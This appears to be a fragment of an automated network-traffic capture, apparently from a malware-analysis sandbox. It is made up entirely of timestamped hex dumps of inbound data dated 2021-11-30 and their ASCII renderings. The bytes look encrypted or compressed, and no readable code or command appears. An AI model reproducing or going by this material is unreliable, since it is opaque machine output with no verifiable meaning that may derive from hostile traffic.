                      2021-11-30 14:33:59 UTC76INData Raw: 99 c5 48 31 a2 2f ae 6f 7b 26 a6 50 06 34 74 5f 62 c1 ee 29 e2 77 29 ca 0c 6c 0b 40 f2 c5 64 08 58 93 5d 8d d1 5d 20 0b b3 73 e9 bb 89 8e c4 31 bb 6e 47 a7 38 76 b6 a2 d4 a8 5a fb e1 ed f6 4e dd 3d b3 ae ba 72 6a 50 20 ec ce 0e c9 a9 e6 ba 38 61 36 78 97 96 40 3e 92 92 93 c9 80 18 c3 bd 14 c4 90 28 bf bc 66 62 5d 82 91 8c f6 80 1d a0 ba b0 c5 c7 91 f5 a8 aa 10 a6 7c 42 f7 e2 6c b1 f4 a2 50 b9 72 48 e3 47 18 1a dc c9 7c 52 95 40 d4 28 be 37 d2 fe 4f 93 e1 15 91 63 e7 70 92 67 f4 8c db 21 a4 cf 9b 22 8f e5 64 b4 35 9c dd bf 86 a7 87 81 72 13 62 9d 2f 15 3e 8e ed f2 26 ba d6 05 42 eb ad 41 2e 67 75 39 25 c4 a7 be 57 c0 78 72 7b 3d c2 a2 2a a2 35 b8 ee e6 02 37 19 30 9e 9b aa e1 43 e9 d6 aa 19 a0 34 8f 0e d7 ea f1 cc 54 3e e4 3a 46 70 6c 5d 3a 20 26 0c 73 e8
                      Data Ascii: H1/o{&P4t_b)w)l@dX]] s1nG8vZN=rjP 8a6x@>(fb]|BlPrHG|R@(7Ocpg!"d5rb/>&BA.gu9%Wxr{=*570C4T>:Fpl]: &s
                      2021-11-30 14:33:59 UTC77INData Raw: 8c b0 1a a6 8b af b8 7c 4b b1 9f 6e bd 26 f8 f7 8c d2 ce a8 70 62 b0 bd 4a 46 e6 51 93 d8 f2 c8 a2 1d bc c3 92 cd 50 00 24 d0 3b 89 df 44 fd d9 8a ae 38 50 03 89 c8 0d 62 3d 66 25 10 ef 69 b7 13 30 3f ec fa 7d a9 ae d0 e2 ff 6f ba cd 17 f0 22 61 63 5b f5 6b 2b 15 54 d1 60 8b f4 9d e5 21 28 6b 90 3a ce e1 f5 43 32 18 65 77 50 63 dd 04 a9 33 55 7c d1 90 1a e6 83 7b 3a 86 7a b5 8c 1d 61 74 32 20 f9 24 f9 df 34 15 58 d7 26 03 ee bc b6 b3 70 17 d1 cf 1c 06 2c ac 88 a1 c4 f7 82 8b 98 6e 0f 61 0c ed f0 56 38 6c 16 5f 0f 2f 85 c7 32 54 94 98 05 7e 37 36 8c 7e 63 6c 60 21 c6 c9 11 4c 14 02 e2 c4 f6 ee 17 89 13 d2 49 25 ed ac 5e f8 90 8d 6c 50 54 b5 0a 0d b5 19 e1 45 08 be 27 fc 27 6e dc 73 5f 74 1f 6c 3b 89 3a 99 e9 a4 51 e6 b5 ca cc be 5b 4f 09 c9 d5 77 4a 9f 9f
                      Data Ascii: |Kn&pbJFQP$;D8Pb=f%i0?}o"ac[k+T`!(k:C2ewPc3U|{:zat2 $4X&p,naV8l_/2T~76~cl`!LI%^lPTE''ns_tl;:Q[OwJ
                      2021-11-30 14:33:59 UTC79INData Raw: f1 8d 7b 2c 21 36 92 ab d1 d6 51 6c 43 7c aa 65 14 c1 06 9b 30 07 91 30 3c c0 4a fa 9b 3e 8f 76 f5 05 21 9d cf 4b 1d 0d 74 46 68 ec 43 4a 1f 43 a5 4c 40 bf 3c 4d fb 7a f6 0f 20 6e 68 6d f3 7c 51 ef 04 4e fd a2 9f 78 05 8f ea 48 e8 5d 9c 16 b3 67 b1 15 3d 43 49 c0 fe e9 70 68 37 cf 8e 1a ec 7c 2b 77 35 1c 16 a8 63 3c d5 73 73 e9 da 17 b1 a5 02 0d 5b 71 68 99 a1 7e 82 52 40 6c 00 e4 9d 72 92 d9 0b 11 e9 e2 72 2d 85 2e 8b 1b 64 d3 de c9 c1 9c 43 88 34 6f be ee fd 22 32 3f e7 5c ce 99 7c 57 38 79 40 08 3b 37 0f 92 7f 00 17 8b 37 93 56 9f 35 40 7b 1a a0 6a d4 c5 57 a0 5f b5 dc 1f c3 d0 07 05 e0 2e df f8 a9 87 93 ac 3a 3b 85 fb 63 5f 10 19 9b 6e 40 11 62 b5 ab 67 27 5e 45 fa 8b 33 8e b7 3d 00 cc 15 64 d8 35 2d 05 86 b2 f1 cb 4e 2c a0 ee ed b4 1f 1d dd fe 4b 74
                      Data Ascii: {,!6QlC|e00<J>v!KtFhCJCL@<Mz nhm|QNxH]g=CIph7|+w5c<ss[qh~R@lrr-.dC4o"2?\|W8y@;77V5@{jW_.:;c_n@bg'^E3=d5-N,Kt
                      2021-11-30 14:33:59 UTC80INData Raw: d0 4d 3a 2e c0 10 3c c8 70 ff 79 b0 8e b4 82 75 ba 03 89 4d 42 f2 86 a7 dd 7f 77 b6 28 66 6f d3 ba a3 a8 45 f5 db 2a 0d 4f 05 8d 52 a0 1c fa 4a e7 95 a0 25 7e ef 0f fb 79 1d 95 1b a3 c4 6d ab 15 c3 21 63 1c 8e 27 8c eb 2d b2 46 ca ca 82 4e 67 b6 7f af 2d 82 ee 18 c7 6b 89 18 f3 8e a6 5e b3 8c b7 bd bd b5 f1 c0 0f 71 e5 4f d0 ba d0 1f 21 e8 3f 95 b5 d4 28 c4 73 fb fe b8 16 01 14 1b 8c 2a d2 2d b7 b8 f1 ba 20 2f 4c a9 84 a7 50 84 b2 35 31 ca fb 27 ac 38 eb f5 fe 8e 53 d0 ea 1f 17 b5 a1 b7 c0 f6 70 65 91 29 c1 2c 0d b2 43 a4 2a a7 34 b3 64 6e 9a 18 46 c5 a3 56 99 4c c8 6e 92 d7 d8 e5 31 14 7c 7a 65 17 ba 47 c7 97 a1 34 8f c1 15 bf c2 cb 81 6a 73 a2 a6 73 5b 4d d2 97 a8 fb 73 7f 4b 8c 6a 52 d3 7a a4 cd e8 92 b9 35 29 42 25 95 f4 d1 31 62 85 9c d3 32 84 14 2f
                      Data Ascii: M:.<pyuMBw(foE*ORJ%~ym!c'-FNg-k^qO!?(s*- /LP51'8Spe),C*4dnFVLn1|zeG4jss[MsKjRz5)B%1b2/
                      2021-11-30 14:33:59 UTC81INData Raw: 0a f3 76 f8 e2 83 32 16 b7 f5 6c 8a e0 2e a4 89 a4 9f 9a eb 89 51 0a 96 c5 e6 b1 b8 c4 dd c2 c9 46 b0 8c 2b d7 b5 f6 c9 d4 98 dc 01 1d dc 8e 00 6f 71 10 ff e8 e0 a2 63 fd c6 ee 03 f6 4f b9 70 f5 ad 74 15 7b fa 6b 05 63 60 53 90 bf 4e 9d 84 02 44 14 aa 8e aa dc aa e0 9b c6 f2 47 da db f6 1f a1 c8 66 c5 88 9a cd 8a 21 20 58 1f 9b ba 69 65 6b 6c e3 65 5e d8 78 b0 71 6e 5a ce 88 f7 30 3f 53 78 6e 88 98 f7 86 08 62 98 92 00 83 3f fa b4 0f 89 8b df c3 d8 cd f4 ec 7d c8 c9 83 13 e9 0a 2c 80 a1 c4 d1 39 6f fa 04 b0 ed c1 48 71 ba 39 83 32 99 a0 a2 49 fa 51 e6 bc 43 f9 16 f2 80 a2 f4 37 08 a9 39 b9 eb 51 5f 9f 35 74 49 c4 b1 a9 c7 d0 e9 c1 fb cb b5 ca b0 2d 11 ca 99 54 1a d8 4b 55 20 dc b1 90 43 1d 7a db b6 e6 58 90 f5 c8 db 16 d2 c9 2e f6 8e f1 53 cf 73 32 e8 37
                      Data Ascii: v2l.QF+oqcOpt{kc`SNDGf! Xiekle^xqnZ0?Sxnb?},9oHq92IQC79Q_5tI-TKU CzX.Ss27
                      2021-11-30 14:33:59 UTC82INData Raw: 9a d2 fa 6d 96 27 98 0c 1b 5f bc ed 39 9a ea a7 09 49 dc 9c 8a 0b e4 a6 1b d7 ab 9d 9b 85 f6 d3 f0 bf 8c 31 e0 f6 fb 55 51 ae fb 55 ab ad 3a 02 bc c3 e6 b0 8c b5 2d 5b fb b1 9c b9 44 7c d1 32 39 7b 19 44 f5 0e 56 c1 bb c8 2e f9 2c 71 61 b9 a4 8d 43 5d 81 fe 4a 30 ff 1b b5 24 d3 3c 41 ab e8 c3 c9 83 80 7d ba 2e eb af a5 2d 78 21 a3 c3 c3 67 2a 1c cb 29 3a a9 7c 22 53 d2 dd 34 a9 ef 2f c8 a2 fd a5 17 d5 ec 55 56 be 43 6b bf 54 75 32 20 df 30 ee 1f c4 af d9 c0 05 e5 f8 ca 35 88 9b a5 95 c6 a2 43 1f d9 92 03 56 a5 ea 4e 9a c3 8e 65 96 f2 0f a9 e8 40 c8 ce 30 df 4b c7 e1 67 ab f2 e5 80 6e dd d8 1d f7 96 7e df b2 c6 67 4c 14 6f 0a 5e 1c 7b 54 3e 61 05 ed 84 ef 0c ff 62 b4 b1 e4 0a bc 09 da 78 a3 a2 f4 59 f7 be 5d 65 61 a6 5f 95 b7 61 3f c4 7b 18 99 65 14 60 d4
                      Data Ascii: m'_9I1UQU:-[D|29{DV.,qaC]J0$<A}.-x!g*):|"S4/UVCkTu2 05CVNe@0Kgn~gLo^{T>abxY]ea_a?{e`
                      2021-11-30 14:33:59 UTC83INData Raw: 17 3d ae c4 34 fc da 38 79 98 70 69 f2 7e 3b ff 39 1f 54 31 5e 83 ff c3 d4 ea a8 0b 10 66 0a e6 d3 c0 ac 7c 2f 26 7a 51 bc 5c ae fe 5f b2 2e fc 8a fa 5a b4 b1 16 aa ee 1b 96 45 4a 95 40 9c a4 5e e0 2a 8a 91 40 11 64 16 bc 15 0e 21 63 da 87 24 19 5b 8c 20 76 3d 36 80 3c b3 72 31 00 f9 75 b3 6f fd 3f d8 fc 2a 6e 84 5b 9d e5 9a 66 49 54 a3 b8 b0 b4 f4 bb 6c 79 f5 b2 35 9f 64 b4 32 99 2f 80 8f 9c 56 69 da 06 e6 db 01 3f 3e cb 27 e8 55 34 53 64 57 1d 75 ec d5 c6 7f 1b c3 6f 40 1c 80 98 41 3e 33 e4 71 6b b4 b0 af 0b 73 62 6d 91 1c ae af 78 bd f7 6b df 89 ee 68 03 6b b0 2e 1a 13 67 77 05 e3 bb 0f 7d ab dc a8 5f 13 c0 75 66 ca 5b 0f 6f e0 44 1a 95 60 80 93 ac e1 e3 dc a2 21 01 9c ca 9b e4 40 9c 24 bf 93 97 d3 f1 ea 88 04 3d 8f b7 fa d3 9c 00 3a da 9b d2 86 42 6d
                      Data Ascii: =48ypi~;9T1^f|/&zQ\_.ZEJ@^*@d!c$[ v=6<r1uo?*n[fITly5d2/Vi?>'U4SdWuo@A>3qksbmxkhk.gw}_uf[oD`!@$=:Bm
                      2021-11-30 14:33:59 UTC84INData Raw: 7f e5 5d ca cf d9 5e 41 1c 99 2b e0 d9 98 a5 0b 83 e1 45 30 52 a7 1f 17 32 60 1e e3 97 51 d4 6c e6 ab d4 23 16 f0 c8 57 19 d9 47 bc 0b 03 2a f4 bd 69 9b b4 45 a0 28 d5 1d 05 b5 4c 94 25 88 a6 c6 f5 ee b8 1a af 17 72 fa 38 c0 14 fd fc 00 9b 4f 0c 73 0f b1 5d 7b 7a a7 1a a4 a5 ed fe 03 66 ef f8 38 c2 80 77 a8 fe ee c8 63 d9 b3 1a dd e3 d8 fc 21 64 f1 07 8a a9 1b b0 2f ad 3d 5f 21 2f ba 49 4b 2b d7 d4 77 ba fe 7f 93 e1 ea e4 73 b4 26 6d b7 7f 74 5e de d0 b3 c8 71 e7 50 43 37 dd cf 35 04 8d 58 78 eb 32 7b 62 ad 2f 15 c1 fb f5 a1 70 45 06 8e 9a 6e 76 35 6c 0d 75 c6 50 d4 58 cb 5b 97 2e 9a df c3 3d 5d a9 66 21 3d 2e 92 10 5d 19 cf eb 83 55 94 57 ba 80 42 97 5e cb 70 8d 13 fe c2 0c 04 6e 8c 5d 59 0f b2 0d d2 50 2d f3 8c 80 b4 6b 9c 12 d3 bd 21 c1 17 6d 46 bc dd
                      Data Ascii: ]^A+E0R2`Ql#WG*iE(L%r8Os]{zf8wc!d/=_!/IK+ws&mt^qPC75Xx2{b/pEnv5luPX[.=]f!=.]UWB^pn]YP-k!mF
                      2021-11-30 14:33:59 UTC86INData Raw: 16 93 6b 1c d6 7e 21 07 0b d2 72 f3 e4 d9 34 0a e0 cc 4f e9 32 33 5d 6a 4e 7e ea a0 c0 5b 97 02 a0 c9 bc b9 6e 1d 49 7c 93 3e e4 4e 58 69 03 27 6b a6 eb ec cf d3 5a 8f 9f 00 cf 0b ba 72 fc 45 a7 7b 77 a3 34 f2 d7 9f 6b e6 82 37 d1 3c d2 88 74 8e de 8b 94 af 3a 55 68 80 43 40 41 ce 02 e8 2d 35 71 21 b6 cb 08 8a c7 b6 47 e6 84 a3 df 9e 43 f6 98 26 8a b9 df f6 cc 27 df a4 ea 66 28 3a 0b 68 35 96 4c cb 4e ef 91 5b c6 16 27 6d fc 06 f3 a7 de 60 82 d2 8d b1 ec 83 56 37 84 8d 4b 83 d0 6b 1f c5 8f bb 1c 5f 7f 56 36 ae 96 48 7e 3c 21 09 39 fd 39 8a 87 75 b0 97 84 61 61 9e c6 ea da 33 e9 c7 a1 77 4d 39 43 f8 8c 7b 0d c1 4a 68 7e 08 41 d8 a5 31 ae 46 9f 7a 74 6c 3b d8 41 76 99 86 29 b3 d6 23 35 5d e9 11 4f 1d 21 75 88 c0 60 a9 21 f8 90 8e a3 15 24 6c bf 72 a3 69 96
                      Data Ascii: k~!r4O23]jN~[nI|>NXi'kZrE{w4k7<t:UhC@A-5q!GC&'f(:h5LN['m`V7Kk_V6H~<!99uaa3wM9C{Jh~A1Fztl;Av)#5]O!u`!$lri
                      2021-11-30 14:33:59 UTC87INData Raw: 99 9b df 12 83 e6 64 44 24 90 b9 f0 57 c0 42 75 92 9f 87 4b 1c 37 ca a5 4b 18 84 7a d1 e2 5c 64 d0 04 e9 97 d1 62 30 c2 b2 2e df 9b 62 6a a6 c7 5d db 47 8c 6b 2c e1 dc 29 20 fb 17 83 8c 3c 97 d6 ae 1e 71 8b 3e 5c 58 bc 40 cc ee 2b 11 68 01 44 10 9b 6f 54 5b 77 5a 74 f8 bb 17 3c 61 da 1c 16 4b b4 2d 58 2e 0d 70 f4 c6 96 40 6e fe 52 60 3f 13 b3 d6 a9 25 5c bb ed 79 1d 04 2d e0 2e 93 01 60 90 50 4c 4f 60 c8 77 56 6f d2 ee 18 bf 83 c3 5e a3 66 1c ea ab aa 86 31 08 67 37 9b 17 e3 fc 87 74 40 93 37 9f 95 c5 f2 e6 6d 95 d7 c5 57 a0 bd 30 5f e3 19 2f 78 05 d2 2e 40 7d 5d 7b 6c 53 0c 3b ec fb c8 da 8d e5 5e 91 63 11 4d b5 43 e2 db a2 ba 05 82 33 8e b7 a9 85 a3 e8 fd 27 10 2d 72 86 14 74 bd b3 b6 5f e0 ed f9 1f b3 58 95 b6 f9 af 3e 58 c7 4e 0f 39 33 62 b8 08 2f bb
                      Data Ascii: dD$WBuK7Kz\db0.bj]Gk,) <q>\X@+hDoT[wZt<aK-X.p@nR`?%\y-.`PLO`wVo^f1g7t@7mW0_/x.@}]{lS;^cMC3'-rt_X>XN93b/
                      2021-11-30 14:33:59 UTC88INData Raw: 73 22 c1 37 fc 2a 3b 07 b3 e9 60 35 c7 e6 49 b3 2c f4 93 e6 64 64 f9 68 24 b0 30 fc 45 ff 95 44 dc 63 b5 77 36 38 65 22 28 da 3f f5 e2 05 a8 36 84 04 6c fc 0b ba 9c 90 9f 7d cd ce ea 44 8a 34 35 58 6e e0 f6 23 68 e6 52 55 e7 6c 6e 39 58 b2 49 77 8a 08 73 68 6c e5 f4 94 07 e9 a9 73 b0 41 ad 52 5f 4d 2f d5 49 2c 2b be d4 12 ba 8d 7f cf e1 a8 e4 1f b4 47 6d d4 7f 1f 5e 96 d0 d2 c8 06 e7 3b 43 6b dd bf 35 76 8d 37 78 8d 32 12 62 c1 2f 70 c1 88 f5 8f 70 2c 06 e0 9a 07 76 35 6c 0d 75 e3 50 a7 58 97 5b d9 2e df df 97 3d 1a a9 27 21 69 2e d7 10 7d 19 9b eb e6 55 f7 57 d2 80 2c 97 31 cb 1c 8d 7c fe a5 0c 6d 6e e9 5d 2a 0f ee 0d 90 50 41 f3 ed 80 d7 6b f7 12 9b bd 40 c1 60 6d 2d bc 81 02 75 52 03 c1 a1 9d 1c 3f 52 72 e8 d3 cf ce d2 70 06 90 7c 6f 36 f5 ef 99 45 e6
                      Data Ascii: s"7*;`5I,ddh$0EDcw68e"(?6l}D45Xn#hRUln9XIwshlsAR_M/I,+Gm^;Ck5v7x2b/pp,v5luPX[.='!i.}UW,1|mn]*PAk@`m-uR?Rrp|o6E
                      2021-11-30 14:33:59 UTC90INData Raw: 8d d7 70 84 13 cc bc d9 b9 1d 19 56 70 95 35 b6 7c 5e 5a 1a 35 62 d3 8e ec bc cd 44 8f 8c 0c 92 0b ac 6f fc 30 ca 79 47 b0 38 e4 d0 9f 18 b2 ee 2d a5 05 e1 f2 1b 8d bb b9 a5 cc 3a 26 1b 94 2f 5b 35 8b 31 f3 5d 26 14 25 d7 d8 6d 89 b1 c0 47 83 f7 b4 b3 96 37 e6 ab 15 fa bf ba da ad 19 ba cb a9 01 5d 53 79 06 47 b6 29 8f 20 8e e5 2f 90 77 42 6d 8e 06 80 82 b7 13 ed 8e e3 94 ec f0 56 6b d7 d8 04 f0 96 0e 4b b7 d8 9b 5d 1b 2d 37 73 da ca 29 33 60 4e 4d 43 98 50 ec eb 14 dc e2 e5 0d 3d ea 8b b6 b5 64 93 a2 c8 15 21 19 2f bc ed 1a 2d b5 0c 09 17 08 33 d8 c0 14 c8 35 f0 5f 0c 1f 3b 84 41 3a e1 e9 1f d4 e2 4a 35 33 cc 31 3c 59 7d 14 ad b4 13 c8 7d f8 dd ab c2 66 4d 49 d1 01 a3 35 96 86 9c 87 2c c2 d3 05 f0 5b 2d 0d 56 e9 29 a0 e2 37 cb 87 cb f0 fc 73 62 c1 27 fc
                      Data Ascii: pVp5|^Z5bDo0yG8-:&/[51]&%mG7]SyG) /wBmVkK]-7s)3`NMCP=d!/-35_;A:J531<Y}}fMI5,[-V)7sb'
                      2021-11-30 14:33:59 UTC91INData Raw: 0f bd 96 13 14 e6 6a f0 f6 e2 0e 10 c2 e5 78 ff ee 5c 1e a0 ab 6e a8 6f da 65 59 f7 a8 40 73 97 78 ef ea 5d e3 8a d9 49 10 ea 4c 28 3d d9 1c be a3 4d 78 07 62 3c 62 9b 00 32 4e 11 53 12 f8 45 5c 3c 3d da 55 16 25 b4 19 58 4b 0d 02 f4 a8 d6 65 08 8a 3b 40 4d 56 d6 ae cf 55 33 d7 95 16 33 76 48 85 56 e1 64 3c 90 19 13 21 60 bc 0b 33 6f be e4 74 bf ea a8 18 c6 09 6e 98 c5 c7 e3 42 64 3b 04 c8 25 97 d2 e8 10 32 ff 56 f3 f2 c5 97 e6 5f d6 bb aa 24 c5 d0 51 42 87 50 4a 48 46 92 4b 79 09 38 3d 05 3f 0f 6c 85 ac d6 b3 9c 80 22 f8 20 74 62 b5 6c a7 a3 cb ce 55 f0 5c ed d2 89 f6 cc ab 9b 55 64 54 05 f6 75 00 cf 80 d3 6d bc c3 b4 7b da 34 f6 da 8b af 51 1b c6 37 10 4d 06 16 be 61 1d dc 5a 2f 31 0b de 7f e4 c2 ee 51 78 93 a5 73 87 5a 43 50 19 4a 09 e4 d2 d4 04 88 63
                      Data Ascii: jx\noeY@sx]IL(=Mxb<b2NSE\<=U%XKe;@MVU33vHVd<!`3otnBd;%2V_$QBPJHFKy8=?l" tblU\UdTum{4Q7MaZ/1QxsZCPJc
                      2021-11-30 14:33:59 UTC92INData Raw: b8 26 8d fd 25 b2 04 da 18 5a 56 0a 7e 4f 8a 46 87 e2 6a a8 50 d4 6d 03 90 7b df cf e3 fa 21 bf eb 9c 37 ef 34 47 7d 6e 93 a6 7f 07 a8 22 10 b7 38 01 7e 2a f3 3d 23 8a 4d 23 48 03 b1 84 f1 46 8a ca 1b d3 2f c2 3d 2a 21 41 ba 3d 4b 2b d7 d4 77 ea fe 10 93 91 ea b4 73 d5 26 1e b7 0c 74 29 de bf b3 ba 71 83 50 43 37 8e cf 58 04 f9 58 08 eb 61 7b 07 ad 5d 15 b7 fb 90 a1 02 45 06 8e 9a 6e 25 35 01 0d 01 c6 20 d4 08 cb 34 97 5c 9a ab c3 3d 5d a9 66 72 3d 43 92 64 5d 69 cf aa 83 36 94 34 ba ef 42 e2 5e a5 70 f9 13 fe c2 5f 04 03 8c 29 59 7f b2 5d d2 31 2d 80 8c f3 b4 1c 9c 7d d3 cf 21 a5 17 6d 46 bc dd 51 25 3d 71 a7 ce e9 7a 48 3b 13 84 a1 aa ab a1 2c 5a d9 59 01 45 96 ef eb 60 83 83 00 44 4d c6 95 85 5a b4 6c 10 8a d6 af 2e 38 37 ae a5 2e 4e 8b 0f c9 96 7a 14
                      Data Ascii: &%ZV~OFjPm{!74G}n"8~*=#M#HF/=*!A=K+ws&t)qPC7XXa{]En%5 4\=]fr=Cd]i64B^p_)Y]1-}!mFQ%=qzH;,ZYE`DMZl.87.Nz
                      2021-11-30 14:33:59 UTC93INData Raw: 28 ba f8 3e a1 3d cf 6e 90 21 a7 78 18 b3 5d ef a4 bf 6b 8e 82 21 d1 13 d2 de 74 9c de b0 94 93 3a 48 68 82 43 12 41 bd 02 d9 2d 36 71 26 b6 d3 08 a5 c7 86 47 e6 84 a8 df a3 43 d3 98 38 8a a2 df cc cc 02 df a7 ea 64 28 20 0b 5a 35 f9 4c fa 4e fa 91 43 c6 18 27 02 fc 6d f3 82 de 13 82 8e 8d c7 ec 9f 56 0d 84 ac 4b 87 d0 6f 1f c5 8f fe 1c 47 7f 7a 36 b3 96 4a 7e 12 21 22 39 eb 39 83 87 72 b0 96 84 51 61 a5 c6 d0 da 02 e9 cb a1 76 4d 7c 43 e0 8c 2b 0d 80 4a 27 7e 38 41 84 a5 5b ae 40 9f 2b 74 73 3b eb 41 55 99 82 29 88 d6 1a 35 41 e9 5e 4f 3f 21 7d 88 d8 60 ad 21 8b 90 f7 a3 29 24 3c bf 75 a3 59 96 e9 d5 e8 42 a9 a0 05 84 08 4c 62 3a 8f 45 d4 c2 40 8f e6 a2 82 8e 16 07 9d 44 b1 76 52 44 d0 86 12 58 a8 89 3a d7 43 9b f5 ba 10 2d a5 0b 6b d5 56 b8 23 8d fc 25
                      Data Ascii: (>=n!x]k!t:HhCA-6q&GC8d( Z5LNC'mVKoGz6J~!"99rQavM|C+J'~8A[@+ts;AU)5A^O?!}`!)$<uYBLb:E@DvRDX:C-kV#%
                      2021-11-30 14:33:59 UTC95INData Raw: 8d fb 29 1c fb 1e 83 9e 3c 94 d6 b8 1e 62 8b 29 5c 61 bc 5a cc c2 2b 0a 68 3e 44 32 9b 6c 54 5d 77 52 74 f7 bb 0d 3c 4e da 09 16 63 b4 0d 58 1b 0d 5e f4 e0 96 4a 6e f9 52 34 3f 25 b3 ae a9 55 5c 84 ed 79 1d 10 2d f1 2e 96 01 5d 90 6b 4c 44 60 e0 77 75 6f df ee 06 bf d8 c3 44 a3 59 1c f4 ab b2 86 25 08 52 37 a6 17 e4 fc b4 74 74 93 02 9f a2 c5 cb e6 17 95 b8 c5 24 a0 ec 30 5f e3 3c 2f 6d 05 93 2e 44 7d 1b 7b 0d 53 18 3b a5 fb e9 da 89 e5 0a 91 2d 11 05 b5 09 e2 a9 a2 e6 05 d2 33 fc b7 95 85 aa e8 f2 27 08 2d 60 86 29 74 9f b3 bf 5f c9 ed d3 1f b3 58 98 b6 f8 af 15 58 d5 4e 14 39 34 62 90 08 47 bb 3c 40 36 62 84 1e d7 bb ea 51 3a 93 94 20 aa 32 02 3c 2b 3d 3a 85 e2 a4 29 e1 57 cc 88 d9 ff 6e 5c 3a 34 e1 12 85 10 3d 05 75 05 07 fe 8e aa cf 8d 28 df f8 5c a1
                      Data Ascii: )<b)\aZ+h>D2lT]wRt<NcX^JnR4?%U\y-.]kLD`wuoDY%R7tt$0_</m.D}{S;-3'-`)t_XXN94bG<@6bQ: 2<+=:)Wn\:4=u(\
                      2021-11-30 14:33:59 UTC96INData Raw: 9c 96 9f 4d cd 87 ea 44 8a 4d 35 13 6e f0 f6 23 68 d8 52 62 e7 57 6e 18 58 9a 49 4f 8a 28 73 3b 6c 9f f4 89 07 e7 a9 77 b0 2f ad 3d 5f 04 2f c9 49 17 2b 93 d4 12 ba 92 7f e6 e1 92 e4 16 b4 60 6d e3 7f 24 5e 82 d0 c0 c8 18 e7 24 43 52 dd bc 35 2a 8d 20 78 86 32 17 62 ad 2f 15 c1 fb f5 a1 70 60 06 fd 9a 32 76 72 6c 62 75 80 50 80 58 9b 5b cb 2e e9 df a6 3d 29 a9 12 21 54 2e fc 10 3a 19 bc eb df 55 d7 57 d5 80 2c 97 30 cb 15 8d 70 fe b6 0c 6d 6e e3 5d 37 0f c1 0d fc 50 59 f3 f4 80 c0 6b 9c 12 99 bd 40 c1 44 6d 00 bc a9 02 55 52 71 c1 ce 9d 3b 3f 59 72 e8 d3 cf ce e7 70 0e 90 09 6f 45 f5 ae 99 15 e6 f7 64 2b 24 ab d8 ec 3b ce 05 75 e6 d6 f3 2e 71 12 ca d6 4b 12 e5 2a bd e5 13 31 b5 03 bf aa a4 6b 44 ac b2 1b be be 0e 69 e5 cf 32 86 22 b0 0a 2a 8d cc 29 73 fb
                      Data Ascii: MDM5n#hRbWnXIO(s;lw/=_/I+`m$^$CR5* x2b/p`2vrlbuPX[.=)!T.:UW,0pmn]7PYk@DmURq;?YrpoEd+$;u.qK*1kDi2"*)s
                      2021-11-30 14:33:59 UTC97INData Raw: fd b3 d7 c8 fa 71 26 01 e5 17 32 15 ee 5b ac 71 54 22 55 d3 aa 7b d6 b4 f2 2e 83 eb c5 b1 ff 30 83 98 4a 8a cd df aa cc 6b 8c cb 85 01 4e 53 7f 06 42 b6 2d 8f 3c 8e f4 2f 9a 77 74 6d 95 06 9e 82 b1 13 ec 8e d9 94 8d f0 22 6b ec d8 2a f0 bd 0e 43 b7 df 9b 69 1b 2b 37 62 da cf 29 22 60 72 4d 5c 98 4a ec f4 14 d9 e2 eb 0d 0f ea b5 b6 da 64 b6 a2 c5 15 28 19 20 bc 8c 1a 0d b5 6f 09 0d 08 1e d8 c1 14 cb 35 fc 5f 74 1f 3b 84 2d 3a ea e9 48 d4 a5 4a 47 33 9f 31 61 59 45 14 e4 b4 0c c8 21 f8 90 ab ef 15 45 00 fc 73 da 45 e2 d3 bb f7 30 ad d4 60 e7 2f 08 6c 4e 88 45 a0 ae 37 fc 87 c3 f0 fd 73 74 c1 6a fc 13 3b 3c b3 e3 60 58 c7 e5 49 b4 2c f0 93 ba 64 08 f9 78 24 89 30 f5 45 e4 95 46 dc 76 b5 77 36 25 65 11 28 ec 3f f3 e2 36 a8 13 84 1f 6c f5 0b bb 9c 86 9f 4f cd
                      Data Ascii: q&2[qT"U{.0JkNSB-</wtm"k*Ci+7b)"`rM\Jd( o5_t;-:HJG31aYE!EsE0`/lNE7stj;<`XI,dx$0EFvw6%e(?6lO
                      2021-11-30 14:33:59 UTC98INData Raw: e1 28 85 57 3d 36 75 46 07 f6 8e 9f cf e0 28 b5 f8 1c a1 24 cf 65 90 37 a7 47 18 b1 5d e8 a4 eb 6b ba 82 44 d1 33 d2 c8 74 8e de a4 94 93 3a 49 68 8b 43 41 41 c4 02 ac 2d 27 71 33 b6 de 08 a6 c7 c8 47 ac 84 ea df ff 43 e5 98 3e 8a bd df 90 cc 44 df e4 ea 01 28 53 0b 60 35 c2 4c ff 4e fd 91 15 c6 58 27 42 fc 06 f3 ea de 67 82 fa 8d e4 ec ca 56 44 84 f7 4b f0 d0 66 1f c3 8f ef 1c 6b 7f 44 36 e0 96 06 7e 4f 21 4d 39 98 39 cc 87 14 b0 99 84 23 61 d0 c6 f5 da 36 e9 e7 a1 51 4d 23 43 92 8c 67 0d b5 4a 09 7e 73 41 9b a5 46 ae 70 9f 11 74 62 3b 84 41 3a 99 92 29 97 d6 18 35 77 e9 73 4f 24 21 14 88 b4 60 98 21 8a 90 c4 a3 00 24 20 bf 6d a3 50 96 f5 d5 87 42 c2 a0 20 84 28 4c 51 3a ba 45 d9 c2 59 8f e4 a2 9f 8e 05 07 a4 44 8e 76 42 44 b3 86 60 58 94 89 30 d7 42 9b
                      Data Ascii: (W=6uF($e7G]kD3t:IhCAA-'q3GC>D(S`5LNX'BgVDKfkD6~O!M99#a6QM#CgJ~sAFptb;A:)5wsO$!`!$ mPB (LQ:EYDvBD`X0B
                      2021-11-30 14:33:59 UTC99INData Raw: 92 0c d6 8b 2e 7c 80 df 46 cd 50 fa 30 70 80 a2 6a 1c 8b 01 f1 83 5b 8b a2 f9 36 73 a2 6c 6d 04 85 24 e1 91 1b 48 51 42 26 1b bb 4a 3b 4d 05 52 11 f0 9b 2a 5e 4e bf 3b 3a 05 f5 35 34 6b 5f 6b 93 c0 e2 56 4e d8 37 33 5a 24 c5 cb cd 7b 51 dd e0 1c 50 19 5f e0 0e 88 6f 5a ff 6b 21 40 14 d5 18 5d 55 9e 86 00 cb 9a f9 37 8c 7e 6b ef 85 ae e4 31 6d 55 44 a7 71 e3 8b 89 06 57 bd 35 f0 9f ea 9a ec 52 9f d7 c5 57 a0 98 30 2c e3 3c 2f 48 05 e0 2e 18 7d 5d 7b 6c 53 6a 3b 85 fb a4 da e8 e5 64 91 4c 11 62 b5 6c e2 db a2 ba 05 82 33 8e b7 fa 85 cc e8 9b 27 64 2d 05 86 75 74 cf b3 d3 5f 01 5a fa 74 1b 7d db b2 7d 79 05 b4 69 ec 02 14 3a e7 c7 5f 5e b1 06 51 37 6d d8 fa de c1 fc df 78 93 a5 20 11 02 44 4b 35 5c 07 6b 68 f5 0d 78 7a 08 d1 de 36 9a 02 4a 2c 44 33 6c 80 a8
